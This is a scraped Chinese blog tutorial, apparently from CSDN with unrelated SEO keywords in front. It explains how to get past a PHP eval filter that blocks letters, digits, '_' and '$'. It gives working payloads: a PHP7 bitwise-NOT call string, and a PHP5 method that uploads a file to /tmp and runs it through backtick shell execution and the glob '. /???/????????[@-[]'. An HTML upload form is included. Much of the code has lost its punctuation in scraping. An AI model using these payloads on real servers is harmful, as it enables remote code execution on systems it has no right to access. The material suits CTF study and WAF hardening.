阳泉住房建设局网站,树立网站整体风格,百度平台电话多少,百度关键词搜索排行目录
引言
如果是在php7
如果是在php5
现在我们来上传文件
最后的结果#xff1a; 看本篇前可以先看这一篇#xff1a;利用异或、取反、自增bypass_webshell_waf-CSDN博客
引言
上一篇介绍了如何构造出一个无字母数字的webshell#xff0c;但是如果后端的代码变成了这…目录
引言
如果是在php7
如果是在php5
现在我们来上传文件
最后的结果 看本篇前可以先看这一篇利用异或、取反、自增bypass_webshell_waf-CSDN博客
引言
上一篇介绍了如何构造出一个无字母数字的webshell但是如果后端的代码变成了这样
?php
if(isset($_GET[code])){$code $_GET[code];if(strlen($code)35){die(Long.);}if(preg_match(/[A-Za-z0-9_$]/,$code)){die(NO.);}eval($code);
}else{highlight_file(__FILE__);
}
这里过滤了大小写字母、数字、_、$因此我们上一篇介绍的利用$和_的方式都无法实现了那么应该怎么构造webshell呢
如果是在php7
php7中这个问题并不是很难解决PHP7前是不允许用($a)();这样的方法来执行动态函数的但PHP7中增加了对此的支持。
所以我们可以通过(phpinfo)();来执行函数第一个括号中可以是任意PHP表达式。
所以很简单了构造一个可以生成phpinfo这个字符串的PHP表达式即可。
因为有大小写字母的限制我们首先需要将phpinfo这个字符串转换为URL编码
?php
$a phpinfo;
echo urlencode(~$a); 那么就可以构造一个如此的payload了
(~%8F%97%8F%96%91%99%90)();
如果是在php5
此时如果我们尝试用PHP7的payload将会得到一个错误
原因就是php5并不支持这种表达方式。
那么这个问题现在呢应该怎么解决呢
操作系统里包含的最重要的两个功能就是“shell系统命令”和“文件系统”很多木马与远控其实也只实现了这两个功能。
PHP自然也能够和操作系统进行交互“反引号”就是PHP中最简单的执行shell的方法。
那么在使用PHP无法解决问题的情况下为何不考虑用“反引号”“shell”的方式来getshell呢
因为反引号不属于“字母”、“数字”所以我们可以执行系统命令但问题来了如何利用无字母、数字、$的系统命令来getshell
好像问题又回到了原点无字母、数字、$在shell中仍然是一个难题。
此时还有两个有趣的Linux shell知识点需要理解
1、shell下可以利用. 来执行任意脚本 它的作用和source一样就是用当前的shell执行一个文件中的命令。
比如当前运行的shell是bash则. file的意思就是用bash执行file文件中的命令。 可以尝试编辑这样一个文件
vim id.txt
echo id然后使用.来执行一下
. id.txt
id可以看到确实是执行了
用. file执行文件是不需要file有x权限的。
那么如果目标服务器上有一个我们可控的文件那不就可以利用.来执行它了吗
这个文件也很好得到我们可以发送一个上传文件的POST包此时PHP会将我们上传的文件保存在临时文件夹下默认的文件名是/tmp/phpXXXXXX文件名最后6个字符是随机的大小写字母。
2、Linux文件名支持用glob通配符代替
执行. /tmp/phpXXXXXX也是有字母的。此时就可以用到Linux下的glob通配符 *可以代替0个及以上任意字符 ?可以代表1个任意字符
那么/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。
但我们尝试执行. /???/?????????却得到如下错误 这是因为能够匹配上/???/?????????这个通配符的文件有很多我们可以列出来 先不看有这么多的文件就在执行第一个匹配上的文件即/bin/abrt-cli的时候就已经出现了错误导致整个流程停止根本不会执行到我们上传的文件。
就跟正则表达式类似glob支持利用[0-9]来表示一个范围。
我们再来看看之前列出可能干扰我们的文件,发现所有文件名都是小写只有PHP生成的临时文件包含大写字母。
那么答案就呼之欲出了我们只要找到一个可以表示“大写字母”的glob通配符就能精准找到我们要执行的文件。
翻开ascii码表可见大写字母位于与[之间 那么我们可以利用[-[]来表示大写字母
. /???/????????[-[]
现在我们来上传文件
web.html
!DOCTYPE html
html langenheadmeta charsetUTF-8meta http-equivX-UA-Compatible contentIEedgemeta nameviewport contentwidthdevice-width, initial-scale1.0titleDocument/title
/headbodyform actionweb1.php methodpost enctypemultipart/form-datainput typefile nameupload_file idinput typesubmit valuesubmit/form
/body/htmlweb.php
?php
if(isset($_GET[code])){$code $_GET[code];if(strlen($code)35){die(Long.);}if(preg_match(/[A-Za-z0-9_$]/,$code)){die(NO.);}eval($code);
}else{highlight_file(__FILE__);
}web1.php
这是是用来显示文件的上传信息的
?php var_dump($_FILES); 注意php生成临时文件名是随机的最后一个字符不一定是大写字母不过多尝试几次也就行了。
首先我们编写一个文件来用作测试 现在我们可以尝试在上传文件后进行抓包
web1.php包 web.php包 然后我们将web1.php包中post的值移动到web.php文件中构造出一个上传文件
还有将Content-Type: multipart/form-data;增加到web.php包中
现在我们就可以在这里使用POST构造出临时文件使用GET匹配临时文件 GE传入的T参数
??./%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]%3b
最后的结果
